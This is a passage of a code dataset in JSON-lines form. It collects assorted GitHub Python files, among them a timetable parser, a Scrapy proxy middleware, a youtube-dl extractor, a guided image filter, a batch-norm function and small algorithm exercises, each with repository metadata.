.'].reset_index(drop=True)\r\n #to datetime\r\n timetable = pd.DataFrame(columns=['timings'])\r\n for row in range(len(data.index)):\r\n #if next row is 2 or 4, the current contains a fraction\r\n current_cell = data.iloc[row,0]\r\n try: next_cell = data.iloc[row+1,0]\r\n except:\r\n pass\r\n if len(current_cell) > 5:\r\n if next_cell == '2':\r\n to_append = current_cell[:5]+' 30'\r\n timetable._set_value(row,'timings',to_append)\r\n elif next_cell == '4':\r\n if current_cell[-1] == '1':\r\n to_append = current_cell[:5]+' 15'\r\n elif current_cell[-1] == '3':\r\n to_append = current_cell[:5]+' 45'\r\n timetable._set_value(row,'timings',to_append)\r\n else:\r\n print('error '+str(current_cell))\r\n print(next_cell)\r\n elif len(current_cell)==1:\r\n pass\r\n else:\r\n to_append = current_cell+' 00'\r\n timetable._set_value(row,'timings',to_append)\r\n timetable.reset_index(inplace=True, drop=True)\r\n\r\n #covert to datetime\r\n timetable.timings = pd.to_datetime(timetable.timings, format='%H %M %S')\r\n\r\n #find passing time\r\n if 'cir' in timetable_file:\r\n if 'eas' in timetable_file:\r\n timetable.timings += pd.to_timedelta('196.5S')\r\n else:\r\n timetable.timings += pd.to_timedelta('143.5S')\r\n elif 'bak' in timetable_file:\r\n if 'eas' in timetable_file:\r\n timetable.timings += pd.to_timedelta('19S')\r\n else:\r\n timetable.timings += pd.to_timedelta('81S')\r\n elif 'vic' in timetable_file:\r\n if 'eas' in timetable_file:\r\n timetable.timings += pd.to_timedelta('16.5S')\r\n else:\r\n timetable.timings += pd.to_timedelta('101S')\r\n\r\n timetable.timings = timetable.timings.dt.time\r\n #save as csv\r\n timetable.to_csv(timetable_file[:-4]+'_.csv', index=False)\r\n\r\n ### ensure manually take overlap from post-midnight runs are put into next days csvs\r\n\r\ntimetable_to_datetime('timetables/cen_wes_sat.csv')","repo_name":"fc445/4th-year","sub_path":"timetables_from_pdf.py","file_name":"timetables_from_pdf.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20414517001","text":"# -*- coding: utf-8 -*-\nimport random\nimport logging\n\nfrom scrapy import signals\n\n\nclass ProxyMiddleware(object):\n test_ip = ['http://user1:pwd1@123.123.123.123:123', 'http://user2:pwd2@234.234.234.234:234']\n num = 0\n\n def process_request(self, request, spider):\n request.meta['proxy'] = random.choice(self.test_ip)\n spider.logger.info('use the proxy is ' + str(request.meta.get('proxy', 'no proxy')))\n #spider.logger.info(request.headers)\n spider.logger.info('retry %d times '%self.num + 'and the request.headers is ' + str(request.headers))\n\n self.num += 1\n\n","repo_name":"ljm9104/scrapy","sub_path":"test_proxy_auth/test_proxy_auth/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"32250971610","text":"import math\n\n\ndef opt_n(c: float):\n a = math.sqrt(1 + 4/c)\n\n remainder = math.atan(1/math.tan(math.pi*(1+a)))\n\n return a - 0.5 + remainder/math.pi\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import seaborn as sns\n import pandas as pd\n sns.set(rc={'figure.figsize': (10, 8)})\n\n partitions = 1000\n c_space = [n/partitions for n in range(1, partitions)]\n\n optimal_n = []\n\n for n, c in enumerate(c_space):\n optimal_n.append(opt_n(c))\n print(f'Progress: {n}/{len(c_space)}', end='\\r')\n\n optimal_n = pd.Series(optimal_n, 
index=c_space)\n\n if True:\n sns_plot = sns.lineplot(data=optimal_n)\n\n sns_plot.set(xlabel='c', ylabel='Optimal N')\n\n sns_plot.get_figure().savefig('Optimal_n.png')\n","repo_name":"NoFishLikeIan/tinbergen","sub_path":"homework/micro_three/plot_opt_n.py","file_name":"plot_opt_n.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} +{"seq_id":"42052309502","text":"import torch\nfrom torch import nn\nfrom d2l import torch as d2l\n\n\ndef batch_norm(X, gamma, beta, moving_mean, moving_var, eps, momentum):\n if not torch.is_grad_enabled():\n x_hat = (X - moving_mean) / torch.sqrt(moving_var + eps)\n else:\n assert len(X.shape) in (2, 4)\n if len(X.shape) == 2:\n mean = X.mean(dim=0)\n var = ((X - mean)**2).mean(dim=0)\n else:\n mean = X.mean(dim=(0, 2, 3), keepdim=True)\n var = ((X - mean)**2).mean(dim=(0, 2, 3), keepdim=True)\n x_hat = (X - mean) / torch.sqrt(var + eps)\n moving_mean = momentum * moving_mean + (1.0 - momentum) * mean\n moving_var = momentum * moving_var + (1.0 - momentum) * var\n Y = gamma * X_hat + beta # 拉伸参数gamma和偏移参数beta\n return Y, moving_mean.data, moving_var.data\n\n\n","repo_name":"righterTY/d2l","sub_path":"demo7/demo7_5.py","file_name":"demo7_5.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4812317943","text":"import math\n\ndef find_st(p):\n t = p-1\n s = 0\n while t%2 == 0:\n t >>= 1\n s += 1\n \n return s,t\n\ndef egcd(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = egcd(b % a, a)\n return (g, x - (b // a) * y, y)\n\ndef modinv(a, m):\n g, x, y = egcd(a, m)\n if g != 1:\n raise Exception('modular inverse does not exist')\n else:\n return x % m\n \ndef compute_init_vals(p, limb_bitsize=64):\n iv = dict()\n iv['modulus'] = p\n iv['s'],iv['t'] = find_st(p)\n iv['t_minus_1_over_2'] = (iv['t']-1)//2\n iv['euler'] = (p-1)//2\n iv['num_bits'] = math.ceil(math.log2(p))\n iv['inv'] = 2**limb_bitsize - modinv(p,2**limb_bitsize)\n iv['Rsquared'] = (2**limb_bitsize)**(2 * math.ceil(math.log2(p)/limb_bitsize)) % p\n iv['Rcubed'] = (2**limb_bitsize)**(3 * math.ceil(math.log2(p)/limb_bitsize)) % p\n return iv \n\ndef pprint(iv,prefix,limb_bitsize=64):\n numlimbs = math.ceil(iv['num_bits']/limb_bitsize)\n print ('auto modulus = bigint<static_cast<mp_size_t>(%d)>(\"%s\");'%(numlimbs,iv['modulus']))\n\n for k in ['euler','t','t_minus_1_over_2','Rsquared','Rcubed',]:\n print('%s::%s = bigint<static_cast<mp_size_t>(%d)>(\"%s\");' % (prefix,k,numlimbs,iv[k]))\n\n print('%s::%s = %s;' % (prefix,'s',iv['s'])) \n print('%s::%s = %s;' % (prefix,'num_bits',iv['num_bits']))\n \n print('%s::%s = %sUL;' % (prefix,'inv',iv['inv']))\n ","repo_name":"niekbouman/libff_init","sub_path":"libff_field_init.py","file_name":"libff_field_init.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18540463945","text":"#!/usr/bin/env python\n\nimport sys\nimport re\n\nfrom Bio import SeqIO\n\nrecord = SeqIO.read(sys.stdin, \"genbank\")\n\nkey = \"locus_tag\"\nfor feature in record.features:\n if feature.type == \"CDS\" and key not in feature.qualifiers:\n product = feature.qualifiers.get(\"product\", [\"\"])[0]\n if product:\n feature.qualifiers[key] = re.sub(r\"[^a-zA-Z0-9*_-]\", \"_\", product)\n\nSeqIO.write(record, sys.stdout, 
\"genbank\")\n","repo_name":"dnanto/dissertation","sub_path":"workflow/scripts/add_locus_tag.py","file_name":"add_locus_tag.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74717123146","text":"# encoding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\nfrom ..compat import compat_xpath\nfrom ..utils import (\n int_or_none,\n qualities,\n unified_strdate,\n xpath_attr,\n xpath_element,\n xpath_text,\n xpath_with_ns,\n)\n\n\nclass FirstTVIE(InfoExtractor):\n IE_NAME = '1tv'\n IE_DESC = 'Первый канал'\n _VALID_URL = r'https?://(?:www\\.)?1tv\\.ru/(?:[^/]+/)+p?(?P<id>\\d+)'\n\n _TESTS = [{\n # single format via video_materials.json API\n 'url': 'http://www.1tv.ru/prj/inprivate/vypusk/35930',\n 'md5': '82a2777648acae812d58b3f5bd42882b',\n 'info_dict': {\n 'id': '35930',\n 'ext': 'mp4',\n 'title': 'Гость Людмила Сенчина. Наедине со всеми. Выпуск от 12.02.2015',\n 'description': 'md5:357933adeede13b202c7c21f91b871b2',\n 'thumbnail': 're:^https?://.*\\.(?:jpg|JPG)$',\n 'upload_date': '20150212',\n 'duration': 2694,\n },\n }, {\n # multiple formats via video_materials.json API\n 'url': 'http://www.1tv.ru/video_archive/projects/dobroeutro/p113641',\n 'info_dict': {\n 'id': '113641',\n 'ext': 'mp4',\n 'title': 'Весенняя аллергия. Доброе утро. Фрагмент выпуска от 07.04.2016',\n 'description': 'md5:8dcebb3dded0ff20fade39087fd1fee2',\n 'thumbnail': 're:^https?://.*\\.(?:jpg|JPG)$',\n 'upload_date': '20160407',\n 'duration': 179,\n 'formats': 'mincount:3',\n },\n 'params': {\n 'skip_download': True,\n },\n }, {\n # single format only available via ONE_ONLINE_VIDEOS.archive_single_xml API\n 'url': 'http://www.1tv.ru/video_archive/series/f7552/p47038',\n 'md5': '519d306c5b5669761fd8906c39dbee23',\n 'info_dict': {\n 'id': '47038',\n 'ext': 'mp4',\n 'title': '\"Побег\". Второй сезон. 
3 серия',\n 'description': 'md5:3abf8f6b9bce88201c33e9a3d794a00b',\n 'thumbnail': 're:^https?://.*\\.(?:jpg|JPG)$',\n 'upload_date': '20120516',\n 'duration': 3080,\n },\n }, {\n 'url': 'http://www.1tv.ru/videoarchive/9967',\n 'only_matching': True,\n }]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n\n # Videos with multiple formats only available via this API\n video = self._download_json(\n 'http://www.1tv.ru/video_materials.json?legacy_id=%s' % video_id,\n video_id, fatal=False)\n\n description, thumbnail, upload_date, duration = [None] * 4\n\n if video:\n item = video[0]\n title = item['title']\n quality = qualities(('ld', 'sd', 'hd', ))\n formats = [{\n 'url': f['src'],\n 'format_id': f.get('name'),\n 'quality': quality(f.get('name')),\n } for f in item['mbr'] if f.get('src')]\n thumbnail = item.get('poster')\n else:\n # Some videos are not available via video_materials.json\n video = self._download_xml(\n 'http://www.1tv.ru/owa/win/ONE_ONLINE_VIDEOS.archive_single_xml?pid=%s' % video_id,\n video_id)\n\n NS_MAP = {\n 'media': 'http://search.yahoo.com/mrss/',\n }\n\n item = xpath_element(video, './channel/item', fatal=True)\n title = xpath_text(item, './title', fatal=True)\n formats = [{\n 'url': content.attrib['url'],\n } for content in item.findall(\n compat_xpath(xpath_with_ns('./media:content', NS_MAP))) if content.attrib.get('url')]\n thumbnail = xpath_attr(\n item, xpath_with_ns('./media:thumbnail', NS_MAP), 'url')\n\n self._sort_formats(formats)\n\n webpage = self._download_webpage(url, video_id, 'Downloading page', fatal=False)\n if webpage:\n title = self._html_search_regex(\n (r'<div class=\"tv_translation\">\\s*<h1><a href=\"[^\"]+\">([^<]*)</a>',\n r\"'title'\\s*:\\s*'([^']+)'\"),\n webpage, 'title', default=None) or title\n description = self._html_search_regex(\n r'<div class=\"descr\">\\s*<div> </div>\\s*<p>([^<]*)</p></div>',\n webpage, 'description', default=None) or self._html_search_meta(\n 'description', webpage, 'description')\n thumbnail = thumbnail or self._og_search_thumbnail(webpage)\n duration = int_or_none(self._html_search_meta(\n 'video:duration', webpage, 'video duration', fatal=False))\n upload_date = unified_strdate(self._html_search_meta(\n 'ya:ovs:upload_date', webpage, 'upload date', fatal=False))\n\n return {\n 'id': video_id,\n 'thumbnail': thumbnail,\n 'title': title,\n 'description': description,\n 'upload_date': upload_date,\n 'duration': int_or_none(duration),\n 'formats': formats\n }\n","repo_name":"galgamerslee/youtobedl","sub_path":"youtube_dl/extractor/firsttv.py","file_name":"firsttv.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"41202643499","text":"import numpy as np\nimport scipy as sp\nimport scipy.ndimage\n\n\ndef box(img, r):\n \"\"\" O(1) box filter\n img - >= 2d image\n r - radius of box filter\n \"\"\"\n (rows, cols) = img.shape[:2]\n imDst = np.zeros_like(img)\n\n\n tile = [1] * img.ndim\n tile[0] = r\n imCum = np.cumsum(img, 0)\n imDst[0:r+1, :, ...] = imCum[r:2*r+1, :, ...]\n imDst[r+1:rows-r, :, ...] = imCum[2*r+1:rows, :, ...] - imCum[0:rows-2*r-1, :, ...]\n imDst[rows-r:rows, :, ...] = np.tile(imCum[rows-1:rows, :, ...], tile) - imCum[rows-2*r-1:rows-r-1, :, ...]\n\n tile = [1] * img.ndim\n tile[1] = r\n imCum = np.cumsum(imDst, 1)\n imDst[:, 0:r+1, ...] = imCum[:, r:2*r+1, ...]\n imDst[:, r+1:cols-r, ...] = imCum[:, 2*r+1 : cols, ...] - imCum[:, 0 : cols-2*r-1, ...]\n imDst[:, cols-r: cols, ...] 
= np.tile(imCum[:, cols-1:cols, ...], tile) - imCum[:, cols-2*r-1 : cols-r-1, ...]\n\n return imDst\n\n\ndef _gf_gray(I, p, r, eps, s=None):\n \"\"\" grayscale (fast) guided filter\n I - guide image (1 channel)\n p - filter input (1 channel)\n r - window raidus\n eps - regularization (roughly, allowable variance of non-edge noise)\n s - subsampling factor for fast guided filter\n \"\"\"\n if s is not None:\n Isub = sp.ndimage.zoom(I, 1/s, order=1)\n Psub = sp.ndimage.zoom(p, 1/s, order=1)\n r = round(r / s)\n else:\n Isub = I\n Psub = p\n\n\n (rows, cols) = Isub.shape\n\n N = box(np.ones([rows, cols]), r)\n\n meanI = box(Isub, r) / N\n meanP = box(Psub, r) / N\n corrI = box(Isub * Isub, r) / N\n corrIp = box(Isub * Psub, r) / N\n varI = corrI - meanI * meanI\n covIp = corrIp - meanI * meanP\n\n\n a = covIp / (varI + eps)\n b = meanP - a * meanI\n\n meanA = box(a, r) / N\n meanB = box(b, r) / N\n\n if s is not None:\n meanA = sp.ndimage.zoom(meanA, s, order=1)\n meanB = sp.ndimage.zoom(meanB, s, order=1)\n\n q = meanA * I + meanB\n return q\n\n\ndef _gf_colorgray(I, p, r, eps, s=None):\n \"\"\" automatically choose color or gray guided filter based on I's shape \"\"\"\n if I.ndim == 2 or I.shape[2] == 1:\n return _gf_gray(I, p, r, eps, s)\n else:\n print(\"Invalid guide dimensions:\", I.shape)\n\n\ndef guided_filter(I, p, r, eps, s=None):\n \"\"\" run a guided filter per-channel on filtering input p\n I - guide image (1 or 3 channel)\n p - filter input (n channel)\n r - window raidus\n eps - regularization (roughly, allowable variance of non-edge noise)\n s - subsampling factor for fast guided filter\n \"\"\"\n if p.ndim == 2:\n p3 = p[:,:,np.newaxis]\n else:\n p3 = p\n\n out = np.zeros_like(p3)\n for ch in range(p3.shape[2]):\n out[:,:,ch] = _gf_colorgray(I, p3[:,:,ch], r, eps, s)\n return np.squeeze(out) if p.ndim == 2 else out\n\n\ndef test_gf():\n import imageio\n cat = imageio.imread('/home/yipai/depth_shape_data/unchecked_result/shizi/1573025814.75.jpg').astype(np.float32) / 255\n tulips = imageio.imread('/home/yipai/depth_shape_data/unchecked_result/shizi/1573025814.75.jpg').astype(np.float32) / 255\n\n # cat = imageio.imread('cat.bmp').astype(np.float32) / 255\n # tulips = imageio.imread('tulips.bmp').astype(np.float32) / 255\n\n r = 8\n eps = 0.05\n\n cat_smoothed = guided_filter(cat, cat, r, eps)\n cat_smoothed_s4 = guided_filter(cat, cat, r, eps, s=4)\n\n imageio.imwrite('cat_smoothed.png', cat_smoothed)\n imageio.imwrite('cat_smoothed_s4.png', cat_smoothed_s4)\n\n tulips_smoothed4s = np.zeros_like(tulips)\n for i in range(3):\n tulips_smoothed4s[:,:,i] = guided_filter(tulips, tulips[:,:,i], r, eps, s=4)\n imageio.imwrite('tulips_smoothed4s.png', tulips_smoothed4s)\n\n tulips_smoothed = np.zeros_like(tulips)\n for i in range(3):\n tulips_smoothed[:,:,i] = guided_filter(tulips, tulips[:,:,i], r, eps)\n imageio.imwrite('tulips_smoothed.png', tulips_smoothed)\n\nif __name__ == \"__main__\":\n test_gf()\n","repo_name":"Guanlan-gkd/finger_vision_master","sub_path":"scripts/fv_lib/gf.py","file_name":"gf.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"73530207624","text":"from PIL import Image\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torchvision import transforms\n\n\nimg_path = \"data/train/ants/0013035.jpg\"\n# Image是python中内置的默认打开图片的函数库\nimg = Image.open(img_path)\n# print(img)\n\nwriter = SummaryWriter(\"logs\")\n\n# python的用法 -> tensor数据类型\n# 
通过transforms.ToTensor去看两个问题:\n\n# 1. transforms如何使用(python)\n\ntensor_trans = transforms.ToTensor()\ntensor_img = tensor_trans(img)\nprint(tensor_img)\n# 借助transforms中内置的众多工具/方法/模板,来打造自己需要的工具\n\n# 2. 为什么需要Tensor数据类型\nwriter.add_image(\"tensor_img\", tensor_img)\nwriter.close()\n\n","repo_name":"ShinATK/Python","sub_path":"Pytorch_quicklearn/P9_transforms.py","file_name":"P9_transforms.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34657098776","text":"def insertion(N, M, i, j):\n mask1 = (-1 << (j+1))\n mask2 = ((1 << i) - 1)\n mask = mask1 | mask2\n N_cleared = N & mask\n M_shifted = M << i\n return (N_cleared | M_shifted)\n\nif __name__ == \"__main__\":\n N = int('10000000000', 2)\n M = int('10011', 2)\n result = insertion(N, M, 2, 6)\n print(bin(result))\n","repo_name":"redixhumayun/ctci","sub_path":"Bits/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34049473337","text":"from collections import defaultdict\r\n\r\n\r\nwith open('C:\\Program Files (x86)\\AdventOfCode\\AoC_day6_test_File.txt') as f:\r\n lines = [int(x) for x in f.readline().split(',')]\r\n\r\ndays = defaultdict(int)\r\n\r\nfor line in lines:\r\n if line not in days:\r\n days[line] = 0\r\n days[line] += 1\r\n\r\n\r\n\r\n\r\nfor day in range(256):\r\n futuredays = defaultdict(int)\r\n for i, j in days.items():\r\n if i == 0:\r\n futuredays[6] += j\r\n futuredays[8] += j\r\n else:\r\n futuredays[i-1] += j\r\n days = futuredays \r\n\r\nprint(sum(days.values()))","repo_name":"jtrosclair1995/AoC2021","sub_path":"Aoc_day6_Part2_Answer.py","file_name":"Aoc_day6_Part2_Answer.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2848378536","text":"def linear_search(arr,key,n):\r\n for i in range(0,n):\r\n if arr[i]==key:\r\n return i\r\n return -1\r\n\r\narr=[]\r\nn=int(input(\"Enter the no. of elements:\\n\"))\r\nprint(\"Enter the values of element:\")\r\nfor i in range(0,n):\r\n ele=int(input())\r\n arr.append(ele)\r\n\r\nkey=int(input(\"Enter the element, which you want to search.\\n\"))\r\nresult=linear_search(arr,key,n)\r\n\r\nif result==-1:\r\n print(\"Element not found!\")\r\nelse:\r\n print(\"Element found at index: \",result)\r\n","repo_name":"priyanshuudainiya/Python-Practice","sub_path":"linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29885466486","text":"def largestPower(num):\n n = int(num)\n k = 0\n while n >= 1:\n if pow(2, k) >= n:\n if pow(2, k) > n:\n k -= 1\n x = pow(2, k)\n break\n k += 1\n print(x)\n\n\nnum = int(input(\"Enter a no.: \"))\nlargestPower(num)","repo_name":"Ashutoshkr007/Spartans","sub_path":"Day1_Q5_Largest_pow.py","file_name":"Day1_Q5_Largest_pow.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21450651205","text":"\"\"\"\n Crie um programa que leia o ano de nascimento de sete pessoas. 
No final mostre quantas pessoas ainda não antingiram a maior idade e quantas já são maiores.\n\n Considere maior idade 21 anos\n\"\"\"\nimport datetime\nprint('Análise de Idades')\nmaior = 0\nmenor = 0\nano = datetime.date.today().year\nfor i in range(1, 8):\n nascimento = int(input(f'Em qual ano nasceu a {i}º Pessoa: '))\n idade = ano - nascimento\n if (idade >= 21):\n maior += 1\n else:\n menor += 1\n\nprint(f'Temos {maior} maiores de idade, e {menor} menores de idade')\n","repo_name":"otonielnn/Python_CursoEmVideo","sub_path":"Desafios/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4333245085","text":"# -*- coding: UTF-8 -*-\n# python3\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nweb_data = requests.get(\"http://python.org/\") # get 整个网页元数据\npython_html = web_data.text # 元数据中提取html部分的文本\nsoup = BeautifulSoup(python_html,'lxml') # 解析html文本,好比 混合物状态的汤 变成 分层的汤\nclean = soup.get_text() #从“分层”的汤里,提取“html文本”这一层 \n# print(clean)\ntokens = [tok for tok in clean.split()]\nprint(\"Total number of tokens: {}\".format(len(tokens)))\nprint(tokens[:25])\nprint(\"\\n---------------\")\n# 对比:用re貌似提纯度更高,也可能分词更细导致噪音增加\ntokens_by_re = re.split(\"\\W+\", clean)\nprint(\"Total number of tokens_by_re: {}\".format(len(tokens_by_re)))\nprint(tokens_by_re[:25])\n\nimport nltk\nFreq_dist_nltk = nltk.FreqDist(tokens) # 词频统计\nprint(Freq_dist_nltk)\nprint(\"\\n------------\")\nfor k, v in Freq_dist_nltk.items():\n print(str(k) + ':' + str(v))\n\n# stopwords exist\nFreq_dist_nltk.plot(50, cumulative=False)\n\n# no stopwords\n# stopwords = [word.strip().lower() for word in open(\"PATH/english.stop.txt\")]\n# clean_tokens = [tok for tok in tokens if len(tok.lower()) > 1 and (tok.lower() not in stopwords)]\n# Freq_dist_nltk = nltk.FreqDist(clean_tokens)\n# Freq_dist_nltk.plot(50, cumulative=False)\n","repo_name":"Zorro-Lin-7/My-Machine-Learning-Learning-Path","sub_path":"NLP/NLTK Essentials/Chapter01/python3_NLTK.py","file_name":"python3_NLTK.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8171275214","text":"import seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef bar_charts(df):\n fig, axs = plt.subplots(2, 4, sharex=True, sharey=True)\n # Iterate over each column in the DataFrame\n i, j = 0, 0\n\n for column, ax in zip(df.columns, axs.flatten()):\n ax.grid(True)\n if j > 3: j = 0\n # Create a bar plot for the current column, colored by the grouped 'D Age' column\n sns.barplot(x=df.index, y=column, data=df, palette='viridis', ax=axs[i][j])\n # Set the title of the plot to the current column name\n plt.title(column)\n plt.legend(loc='upper right')\n # Rotate x-axis labels for better visibility\n plt.xticks(rotation=75)\n if j == 3: i += 1\n j += 1\n # Display the plot\n plt.show()\n\ndef corr_heatmap(corr_matrix):\n \n plt.figure(figsize=(10, 8))\n sns.heatmap(corr_matrix, annot=True, cmap='coolwarm')\n plt.title('Correlation Matrix')\n plt.show()","repo_name":"Stratar/Inferring-Touorist-Thematic-Preferences","sub_path":"data_visualisation.py","file_name":"data_visualisation.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21541274696","text":"from time import sleep\n\n\n# The default speed for each line 
appearing on the command line\nsleep_time = 0.025\n\n\ndef display_menu(message):\n \"\"\"Displays a menu with a given message. Each menu has a standard speed at\n which it appears and a standard formatting, hence this helper method.\n\n Parameters\n ----------\n message : str\n The message to be delivered in the menu\n\n Returns\n -------\n None\n \"\"\"\n print(\"\\n\")\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n sleep(sleep_time)\n for line in message.splitlines():\n if len(line) != 0:\n print(line)\n sleep(sleep_time)\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n sleep(sleep_time * 2)","repo_name":"gzinck/des","sub_path":"cli/display/display_menu.py","file_name":"display_menu.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"41773068755","text":"def calc_media(tupla):\n '''Recebe tupla (RA,P1,P2) e produz tupla (RA,P1,P2,Média)'''\n ra, p1, p2 = tupla\n return (ra, p1, p2, (p1 + p2) / 2)\n\nif __name__ == '__main__':\n # Entrada de dados\n print('Dados dos Alunos')\n alunos = []\n resp = 'S'\n while resp.upper() == 'S':\n RA = input('RA? ')\n try:\n P1 = float(input('P1? '))\n P2 = float(input('P2? '))\n alunos.append((RA, P1, P2))\n resp = input('Outro aluno [S|N]? ')\n except:\n # quando ocorre erro, repete entrada\n resp = 'S'\n print(alunos)\n\n # Mapeamento\n print('Médias dos Alunos')\n # aplica função calc_media aos elementos da lista alunos\n resultados = list(map(calc_media, alunos))\n print(resultados)\n","repo_name":"pjandl/opy2","sub_path":"Lista_1/opy2_l1_exercicio04.py","file_name":"opy2_l1_exercicio04.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"9098929805","text":"from typing import List\n\nfrom brick_yard.blue_print import CMakeBluePrint, EnvVars\n\n\nclass libint(CMakeBluePrint):\n \"\"\"\n libint -- Integral library for QChem and CP2K\n \"\"\"\n\n name = \"libint\"\n version = \"2.7.1\"\n required_lmod = [\"cmake\", \"eigen\"]\n\n def source(self, env: EnvVars) -> List[str]:\n env.base_folder = f\"libint-{env.version}\"\n env.tar_file = f\"{env.base_folder}.tgz\"\n env.url = f\"https://github.com/evaleev/libint/releases/download/v{env.version}/{env.tar_file}\"\n\n return [\n f\"wget {env.url} -P {env.source_path}\",\n f\"tar -xf {env.source_path}/{env.tar_file} -C {env.source_path}\",\n f\"rm -rf {env.source_path}/{env.tar_file}\",\n f\"mv {env.source_path}/{env.base_folder}/* {env.source_path}\",\n ]\n","repo_name":"dustinrb/CBECws_bootsrap","sub_path":"blue_prints/libint.py","file_name":"libint.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27428417642","text":"# 1748 수 이어 쓰기1\r\nimport sys\r\ninput = sys.stdin.readline\r\nN = int(input())\r\n\r\nlength = len(str(N))\r\nsum = 0\r\nfor i in range(length-1):\r\n sum += (i+1)*9*10**i\r\n\r\nprint(sum+ length*(N-10**(length-1)+1))\r\n\r\n ","repo_name":"daeun0220/code_study","sub_path":"codeplus/Bruteforce/broj.py","file_name":"broj.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24979350053","text":"#!/usr/bin/python3\nimport numpy\ndef build_matrix(size):\n zeros = ['0' for i in range(size // 10)]\n ones = ['1' for i in 
range(size // 10)]\n spaces = [' ' for i in range(size - len(zeros) - len(ones))]\n total = zeros + ones + spaces\n numpy.random.shuffle(total)\n return ''.join(total)\n\n# Keep times between 100 to 500 \ntimes = 300\nmatrix = build_matrix(5000)\nflag = \"m365{needle_1n_hayst4ck}\"\nwhile True:\n if times == 0:\n print(flag, end='')\n print(matrix, end='')\n times -= 1","repo_name":"3vilbuff3r/ctf-public","sub_path":"dev/matrix/runme.py","file_name":"runme.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41189381646","text":"from functools import lru_cache\nfrom host.models import PkeyModel\n\n\n\nclass PkeyManger(object):\n '''管理公私钥类'''\n\n keys = ('public_key', 'private_key')\n\n @classmethod\n @lru_cache(maxsize=64)\n def get(cls, name):\n '''获取公私钥,从库中获取'''\n info = PkeyModel.objects.filter(name=name).first()\n if not info:\n raise KeyError(f'没有这个{name!r}密钥对')\n\n #已元祖形式,返回公私钥\n return (info.private, info.public)\n\n @classmethod\n def set(cls, name, private_key, public_key, description=None):\n '''保存公私钥,入库'''\n PkeyModel.objects.update_or_create(name=name, defaults={\n 'private': private_key,\n 'public': public_key,\n 'description': description\n })","repo_name":"ChuzhouOpensource/orange","sub_path":"orange_api/orange_api/utils/key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3141607314","text":"# [카카오] 키패드 누르기\nlocations = [\n (3, 1),\n (0, 0),\n (0, 1),\n (0, 2),\n (1, 0),\n (1, 1),\n (1, 2),\n (2, 0),\n (2, 1),\n (2, 2),\n]\n\n\ndef solution(numbers, hand):\n answer = []\n left = (3, 0)\n right = (3, 2)\n for number in numbers:\n ny, nx = locations[number]\n if nx == 0:\n answer.append(\"L\")\n left = (ny, nx)\n elif nx == 2:\n answer.append(\"R\")\n right = (ny, nx)\n else:\n distance_from_left = abs(ny - left[0]) + 